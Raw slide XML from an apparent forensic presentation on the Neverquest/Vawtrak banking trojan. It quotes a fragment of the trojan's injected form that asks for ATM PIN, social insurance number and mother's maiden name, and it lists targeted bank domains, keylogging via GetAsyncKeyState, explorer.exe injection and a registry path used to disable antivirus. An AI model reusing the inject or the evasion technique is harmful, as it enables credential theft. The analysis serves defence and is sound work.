            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="25"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>Atm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> PIN&lt;/td&gt;&lt;td&gt;&lt;input id="pin" type="text" autocomplete="off" value="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="4"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Social Insurance Number&lt;/ td&gt;&lt;td&gt;&lt;input id="sin" type="text" autocomplete="off" value="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="25"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Mother\'s Maiden Name&lt;/td&gt;&lt;td&gt;&lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>mmn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>" type="text" autocomplete="off" value="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="25"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Driver\'s License&lt;/td&gt;&lt;td&gt;&lt;input id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>dln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>" type="text" autocomplete="off" value="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="25"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Date of Birth&lt;/td&gt;&lt;td&gt;&lt;input id="dob" type="text" autocomplete="off" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>lue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="10"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;2-digit Issue Number&lt;/td&gt;&lt;td&gt;&lt;input id="2dn" type="text" autocomplete="off" value="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>="2"&gt;&lt;/td&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;\  	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>&gt;&lt;td id="question1" class="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>bodyText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>"&gt;Question: '+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>[0]+ '&lt;/td&gt;&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Oval 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2999583" y="3418023"/>
            <a:ext cx="2040257" cy="25668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2999583" y="3674712"/>
            <a:ext cx="2040257" cy="39178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999583" y="4161072"/>
            <a:ext cx="1472769" cy="31072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909214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EQ Framework Injector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1512588"/>
            <a:ext cx="8478213" cy="3753460"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>americanexpress.com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secure.bankofamerica.com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barclaycardus.com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chaseonline.chase.com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cibconline.cibc.com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online.citibank.com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desjardins.com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discovercard.com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cdn.etrade.com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fiabusinesscard.com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fidelity.com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frostbank.com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hsbcreditcard.com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businessonline.huntington.com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key.com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navyfederal.org</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onlinebanking.pnc.com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royalbank.com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schwab.com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internetbanking.suncorpbank.com.au</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tdcanadatrust.com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treasurypathways.com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troweprice.com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usaa.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wellsfargofinancial.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRP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741148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EQ Framework Injector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetAsyncKeyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to record data that the victims types into Internet forms.</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943100"/>
            <a:ext cx="8142287" cy="99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815844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1811372"/>
            <a:ext cx="8478213" cy="3179007"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> takes advantage of Software Restriction Policies to limit the effectiveness of anti-virus applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CodeIdentifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\0\Paths\[hash value]</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759822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00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66" y="1800256"/>
            <a:ext cx="8033334" cy="76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66" y="2540626"/>
            <a:ext cx="8057144" cy="151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769742"/>
            <a:ext cx="8478213" cy="788988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="4319676"/>
            <a:ext cx="8478213" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Antivirus logs and Event logs can hold clues to the existence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NeverQuest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> activity on the system.</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47" y="1548042"/>
            <a:ext cx="5486400" cy="2505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6" y="1014201"/>
            <a:ext cx="8478213" cy="628745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>The Standard Forensic Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="2137399"/>
            <a:ext cx="8478213" cy="3360234"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>No unusual processes in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Prefetch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>No unusual Internet History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Nothing in the Firewall Logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368291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Money Is My Money: The Dynamics of a Banking Trojan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Slaybaugh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cyber Incident Analyst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="475147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6" y="1014202"/>
            <a:ext cx="8478213" cy="643614"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Memory Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="2044392"/>
            <a:ext cx="8478213" cy="3164497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>No outbound connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>No unusual services running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>No unusual processes running</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3538430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Memory Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1751485"/>
            <a:ext cx="8478213" cy="486193"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unusual entry in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Autoruns</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65" y="2547937"/>
            <a:ext cx="8424194" cy="199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040566" y="3694771"/>
            <a:ext cx="5070088" cy="43118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17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1"/>
            <a:ext cx="8478213" cy="666225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="3849278"/>
            <a:ext cx="8478213" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> injection into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> running process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hooks user owned processes and child processes before restoring the original thread.</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90" y="1679592"/>
            <a:ext cx="6076950" cy="1971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6" y="1014201"/>
            <a:ext cx="8478213" cy="599009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Memory Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="3739377"/>
            <a:ext cx="8478213" cy="446048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
